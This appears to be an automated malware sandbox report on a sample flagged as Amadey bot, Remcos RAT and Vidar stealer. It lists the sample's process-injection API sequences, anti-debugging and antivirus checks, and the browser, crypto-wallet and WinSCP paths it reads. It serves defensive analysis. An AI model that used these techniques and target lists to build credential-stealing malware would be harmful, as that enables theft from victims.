Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC6E28 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00CC6E28
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0042305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0042305A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0042A161 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0042A161
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0042ECD7 SetUnhandledExceptionFilter,	3_2_0042ECD7
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	3_2_61EAF900

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Memory written: C:\Users\user\Desktop\yaALNupJCH.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Memory written: C:\Users\user\Desktop\yaALNupJCH.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CB34C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_00CB34C0

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

2_2_00412045

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe	Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CB3680 ShellExecuteA,Sleep,Sleep,CreateThread,Sleep,Sleep,

0_2_00CB3680

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_00419575 mouse_event,

2_2_00419575

Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager_
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoA,	2_2_0040F81F
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00452004
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,	2_2_00452254
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: EnumSystemLocalesW,	2_2_004482C4
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0045237D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,	2_2_00452484
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00452551
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,	2_2_004487AD
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00451C19
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: EnumSystemLocalesW,	2_2_00451EDC
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: EnumSystemLocalesW,	2_2_00451E91
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: EnumSystemLocalesW,	2_2_00451F77
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,	3_2_00419AB2
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0043105A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0043101E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00430357
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_0042F493
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_004275BA
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00430645
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_0042F6FB
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoA,	3_2_004297DD
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_00433942
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00433A1C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00430B2C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_00430C21
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_00430CC8
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_00430D23
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_00430EF4
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_00430FB7

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Queries volume information: C:\Users\user\Desktop\yaALNupJCH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CC2CED cpuid

0_2_00CC2CED

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CC2F2B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00CC2F2B

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CCFC87 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00CCFC87

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CBF340 Sleep,Sleep,IsUserAnAdmin,GetUserNameA,GetComputerNameExW,GetModuleFileNameA,

0_2_00CBF340

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CB4210 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00CB4210

Source: C:\Users\user\Desktop\yaALNupJCH.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Source: Amcache.hve.6.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: yaALNupJCH.exe, 00000003.00000002.909148118.0000000002DAB000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.909197492.00000000038C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: yaALNupJCH.exe, type: SAMPLE
Source: Yara match	File source: 2.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, type: DROPPED

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		2_2_0040BA7E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: \key3.db		2_2_0040BA7E

Found many strings related to Crypto-Wallets (likely being stolen)

Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\??*Xh
Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\backups
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\??*Xh
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\backups
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\??n=`
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

2_2_0040B960

Source: Yara match

File source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, type: DROPPED

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: cmd.exe

2_2_0040569A

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E1307A sqlite3_transfer_bindings,	3_2_61E1307A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D5E6 sqlite3_bind_int64,	3_2_61E2D5E6
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D595 sqlite3_bind_double,	3_2_61E2D595
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E0B431 sqlite3_clear_bindings,	3_2_61E0B431
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E037F3 sqlite3_value_frombind,	3_2_61E037F3
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D781 sqlite3_bind_zeroblob64,	3_2_61E2D781
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D714 sqlite3_bind_zeroblob,	3_2_61E2D714
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D68C sqlite3_bind_pointer,	3_2_61E2D68C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D65B sqlite3_bind_null,	3_2_61E2D65B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D635 sqlite3_bind_int,	3_2_61E2D635
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D9B0 sqlite3_bind_value,	3_2_61E2D9B0
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D981 sqlite3_bind_text16,	3_2_61E2D981
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D945 sqlite3_bind_text64,	3_2_61E2D945
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D916 sqlite3_bind_text,	3_2_61E2D916
